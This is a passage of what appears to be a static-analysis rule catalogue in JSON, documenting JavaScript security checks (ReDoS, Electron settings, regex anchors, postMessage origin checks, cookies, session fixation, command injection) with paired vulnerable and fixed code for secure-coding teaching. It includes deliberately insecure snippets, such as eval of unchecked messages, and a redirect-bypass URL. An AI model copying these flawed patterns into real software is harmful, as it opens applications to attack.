long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *n<sup>k</sup>* or even *2<sup>n</sup>*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(?<!\\s)\\s+$/g`), or just by using the built-in trim method (`text.trim()`).\n\nNote that the sub-expression `\"^\\s+\"` is **not** problematic as the `^` anchor restricts when that sub-expression can start matching, and as the regular expression engine matches from left to right.\n\n\n## Example\nAs a similar, but slightly subtler problem, consider the regular expression that matches lines with numbers, possibly written using scientific notation:\n\n```javascript\n\n/^0\\.\\d+E?\\d+$/.test(str) // BAD\n```\nThe problem with this regular expression is in the sub-expression `\\d+E?\\d+` because the second `\\d+` can start matching digits anywhere after the first match of the first `\\d+` if there is no `E` in the input string.\n\nThis is problematic for strings that do **not** end with a digit. Such a string will force the regular expression engine to process each digit sequence once per digit in the sequence, again leading to a quadratic time complexity.\n\nTo make the processing faster, the regular expression should be rewritten such that the two `\\d+` sub-expressions do not have overlapping matches: `^0\\.\\d+(E\\d+)?$`.\n\n\n## Example\nSometimes it is unclear how a regular expression can be rewritten to avoid the problem. In such cases, it often suffices to limit the length of the input string. For instance, the following regular expression is used to match numbers, and on some non-number inputs it can have quadratic time complexity:\n\n```javascript\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str) // BAD\n```\nIt is not immediately obvious how to rewrite this regular expression to avoid the problem. However, you can mitigate performance issues by limiting the length to 1000 characters, which will always finish in a reasonable amount of time.\n\n```javascript\n\nif (str.length > 1000) {\n    throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-1333","external/cwe/cwe-730","external/cwe/cwe-400"],"description":"A regular expression that can require polynomial time\n              to match may be vulnerable to denial-of-service attacks.","id":"js/polynomial-redos","kind":"path-problem","name":"Polynomial regular expression used on uncontrolled data","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/identity-replacement","name":"js/identity-replacement","shortDescription":{"text":"Replacement of a substring with itself"},"fullDescription":{"text":"Replacing a substring with itself has no effect and may indicate a mistake."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-116"],"description":"Replacing a substring with itself has no effect and may indicate a mistake.","id":"js/identity-replacement","kind":"problem","name":"Replacement of a substring with itself","precision":"very-high","problem.severity":"warning","security-severity":"5.0"}},{"id":"js/enabling-electron-insecure-content","name":"js/enabling-electron-insecure-content","shortDescription":{"text":"Enabling Electron allowRunningInsecureContent"},"fullDescription":{"text":"Enabling allowRunningInsecureContent can allow remote code execution."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n  webPreferences: {\n    allowRunningInsecureContent: true\n  }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n","markdown":"# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n  webPreferences: {\n    allowRunningInsecureContent: true\n  }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n"},"properties":{"tags":["security","frameworks/electron","external/cwe/cwe-494"],"description":"Enabling allowRunningInsecureContent can allow remote code execution.","id":"js/enabling-electron-insecure-content","kind":"problem","name":"Enabling Electron allowRunningInsecureContent","precision":"very-high","problem.severity":"error","security-severity":"8.8"}},{"id":"js/disabling-electron-websecurity","name":"js/disabling-electron-websecurity","shortDescription":{"text":"Disabling Electron webSecurity"},"fullDescription":{"text":"Disabling webSecurity can cause critical security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n  webPreferences: {\n    webSecurity: false\n  }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n","markdown":"# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n  webPreferences: {\n    webSecurity: false\n  }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n"},"properties":{"tags":["security","frameworks/electron","external/cwe/cwe-079"],"description":"Disabling webSecurity can cause critical security vulnerabilities.","id":"js/disabling-electron-websecurity","kind":"problem","name":"Disabling Electron webSecurity","precision":"very-high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/regex/missing-regexp-anchor","name":"js/regex/missing-regexp-anchor","shortDescription":{"text":"Missing regular expression anchor"},"fullDescription":{"text":"Regular expressions without anchors can be vulnerable to bypassing."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n    let url = req.param(\"url\");\n    // BAD: the host of `url` may be controlled by an attacker\n    if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n        res.redirect(url);\n    }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n    let url = req.param(\"url\");\n    // GOOD: the host of `url` can not be controlled by an attacker\n    if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n        res.redirect(url);\n    }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n    let url = req.param(\"url\");\n    // BAD: the host of `url` may be controlled by an attacker\n    if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n        res.redirect(url);\n    }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n    let url = req.param(\"url\");\n    // GOOD: the host of `url` can not be controlled by an attacker\n    if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n        res.redirect(url);\n    }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Regular expressions without anchors can be vulnerable to bypassing.","id":"js/regex/missing-regexp-anchor","kind":"problem","name":"Missing regular expression anchor","precision":"medium","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/missing-origin-check","name":"js/missing-origin-check","shortDescription":{"text":"Missing origin verification in `postMessage` handler"},"fullDescription":{"text":"Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n    let origin = event.origin.toLowerCase();\n\n    console.log(origin)\n    // BAD: the origin property is not checked\n    eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n    console.log(event.origin)\n    // GOOD: the origin property is checked\n    if (event.origin === 'https://www.example.com') {\n        // do something\n    }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n","markdown":"# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n    let origin = event.origin.toLowerCase();\n\n    console.log(origin)\n    // BAD: the origin property is not checked\n    eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n    console.log(event.origin)\n    // GOOD: the origin property is checked\n    if (event.origin === 'https://www.example.com') {\n        // do something\n    }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020","external/cwe/cwe-940"],"description":"Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler.","id":"js/missing-origin-check","kind":"problem","name":"Missing origin verification in `postMessage` handler","precision":"medium","problem.severity":"warning","security-severity":"5"}},{"id":"js/samesite-none-cookie","name":"js/samesite-none-cookie","shortDescription":{"text":"Sensitive cookie without SameSite restrictions"},"fullDescription":{"text":"Sensitive cookies where the SameSite attribute is set to \"None\" can in some cases allow for Cross-Site Request Forgery (CSRF) attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n","markdown":"# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n"},"properties":{"tags":["security","external/cwe/cwe-1275"],"description":"Sensitive cookies where the SameSite attribute is set to \"None\" can\n              in some cases allow for Cross-Site Request Forgery (CSRF) attacks.","id":"js/samesite-none-cookie","kind":"problem","name":"Sensitive cookie without SameSite restrictions","precision":"medium","problem.severity":"warning","security-severity":"5.0"}},{"id":"js/session-fixation","name":"js/session-fixation","shortDescription":{"text":"Failure to abandon session"},"fullDescription":{"text":"Reusing an existing session as a different user could allow an attacker to access someone else's account by using their session."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n    secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n    // Check that username password matches\n    if (req.body.username === 'admin' && req.body.password === 'admin') {\n        req.session.authenticated = true;\n        res.redirect('/');\n    } else {\n        res.redirect('/login');\n    }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n    secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n    // Check that username password matches\n    if (req.body.username === 'admin' && req.body.password === 'admin') {\n        req.session.regenerate(function (err) {\n            if (err) {\n                res.send('Error');\n            } else {\n                req.session.authenticated = true;\n                res.redirect('/');\n            }\n        });\n    } else {\n        res.redirect('/login');\n    }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n","markdown":"# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n    secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n    // Check that username password matches\n    if (req.body.username === 'admin' && req.body.password === 'admin') {\n        req.session.authenticated = true;\n        res.redirect('/');\n    } else {\n        res.redirect('/login');\n    }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n    secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n    // Check that username password matches\n    if (req.body.username === 'admin' && req.body.password === 'admin') {\n        req.session.regenerate(function (err) {\n            if (err) {\n                res.send('Error');\n            } else {\n                req.session.authenticated = true;\n                res.redirect('/');\n            }\n        });\n    } else {\n        res.redirect('/login');\n    }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n"},"properties":{"tags":["security","external/cwe/cwe-384"],"description":"Reusing an existing session as a different user could allow\n              an attacker to access someone else's account by using\n              their session.","id":"js/session-fixation","kind":"problem","name":"Failure to abandon session","precision":"medium","problem.severity":"warning","security-severity":"5"}},{"id":"js/indirect-command-line-injection","name":"js/indirect-command-line-injection","shortDescription":{"text":"Indirect uncontrolled command line"},"fullDescription":{"text":"Forwarding command-line arguments to a child process executed within a shell may indirectly introduce command-line injection vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n    nodeOpts = args[1];\n    args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Indirect uncontrolled command 